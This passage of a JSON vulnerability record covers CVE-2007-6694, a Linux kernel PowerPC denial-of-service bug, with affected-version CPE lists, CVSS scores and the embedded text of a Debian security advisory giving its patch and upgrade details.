                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14:rc5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.16:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.17:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.24:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.31:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.32:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.39:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.40:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.48:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.49:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.8:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16_rc7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14:rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15:rc6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15:rc7:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.14:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.15:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.22:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.30:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.37:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.38:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.47:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16:rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16:rc5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16:rc6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.13:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.14:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.8:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.9:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.66:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test7:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.10:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.22:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15:rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15:rc5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.13:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.20:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.21:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.28:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.29:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.35:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.44:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.45:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.51:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.52:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16:rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17:rc5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17:rc6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.8:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc7:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6_test9_cvs:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:apple:powerpc:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-6694"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cyrill Gorcunov\u203b gorcunov@gmail.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2007-6694",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": true,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-6694",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-30056",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-6694",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200801-420",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-30056",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-30056"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-001057"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200801-420"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-6694"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The chrp_show_cpuinfo function (chrp/setup.c) in Linux kernel 2.4.21 through 2.6.18-53, when running on PowerPC, might allow local users to cause a denial of service (crash) via unknown vectors that cause the of_get_property function to fail, which triggers a NULL pointer dereference. The Linux kernel is prone to a local denial-of-service vulnerability. \nAttackers can exploit this issue to crash the affected kernel, denying service to legitimate users. \nThis issue affects Linux kernel 2.4.21 through 2.6.18-53 running on the PowerPC architecture. The NFSv4 implementation is one of the distributed file system protocols. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1565-1                security@debian.org\nhttp://www.debian.org/security/                           dann frazier\nMay 1, 2008                         http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage        : linux-2.6\nVulnerability  : several vulnerabilities\nProblem type   : local\nDebian-specific: no\nCVE Id(s)      : CVE-2007-6694 CVE-2008-0007 CVE-2008-1294 CVE-2008-1375\n\nSeveral local vulnerabilities have been discovered in the Linux kernel\nthat may lead to a denial of service or the execution of arbitrary\ncode. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2007-6694\n\n    Cyrill Gorcunov reported a NULL pointer dereference in code specific\n    to the CHRP PowerPC platforms. \n\nCVE-2008-1294\n\n    David Peer discovered that users could escape administrator imposed cpu\n    time limitations (RLIMIT_CPU) by setting a limit of 0. \n\nCVE-2008-1375\n\n    Alexander Viro discovered a race condition in the directory notification\n    subsystem that allows local users to cause a Denial of Service (oops)\n    and possibly result in an escalation of priveleges. \n\nFor the stable distribution (etch), this problem has been fixed in version\n2.6.18.dfsg.1-18etch3. \n\nThe unstable (sid) and testing distributions will be fixed soon. \n\nWe recommend that you upgrade your linux-2.6, fai-kernels, and\nuser-mode-linux packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatability with or to take advantage of this update:\n\n                                             Debian 4.0 (etch)\n     fai-kernels                             1.17+etch.18etch3\n     user-mode-linux                         2.6.18-1um-2etch.18etch3\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch3.dsc\n    Size/MD5 checksum:      740 950fed7ed7c289cfea9c1b39f0f41bc0\n  http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch2.dsc\n    Size/MD5 checksum:      740 6f6faa132a53e808bcc61823d140290a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch3.diff.gz\n    Size/MD5 checksum:  5395308 ae08d42b58cd3cf93a23fe31615ac2fd\n  http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz\n    Size/MD5 checksum:    14435 4d10c30313e11a24621f7218c31f3582\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\n    Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\n  http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch3.dsc\n    Size/MD5 checksum:      892 ca5cdee7568704bc9f6c58f786d0daae\n  http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch3.tar.gz\n    Size/MD5 checksum:    55267 981e9a0a1d79b1605164588eef7da492\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch3.dsc\n    Size/MD5 checksum:     5672 4e4714f542968b30b2c3f94e203e1e04\n  http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch2.tar.gz\n    Size/MD5 checksum:    55185 0a46d75b3ced870a96ea41b900f1ecaa\n  http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch2.diff.gz\n    Size/MD5 checksum:    16873 868c1f27ad2c8db782bbd2bdc3618d70\n  http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch2.dsc\n    Size/MD5 checksum:      892 52c602d55bdc301a0622ed8a63745f29\n  http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch3.diff.gz\n    Size/MD5 checksum:    16968 ff99991657e11545a0f557b623962c52\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-18etch3_all.deb\n    Size/MD5 checksum:  3589210 d2033347599e8db12e2446fd75c0ce37\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-18etch3_all.deb\n    Size/MD5 checksum:    54558 3362cfa5f1de0c80b1aa96f22d846c7e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-18etch3_all.deb\n    Size/MD5 checksum:  1586214 a496f633c826ce730ce6150dff49209f\n  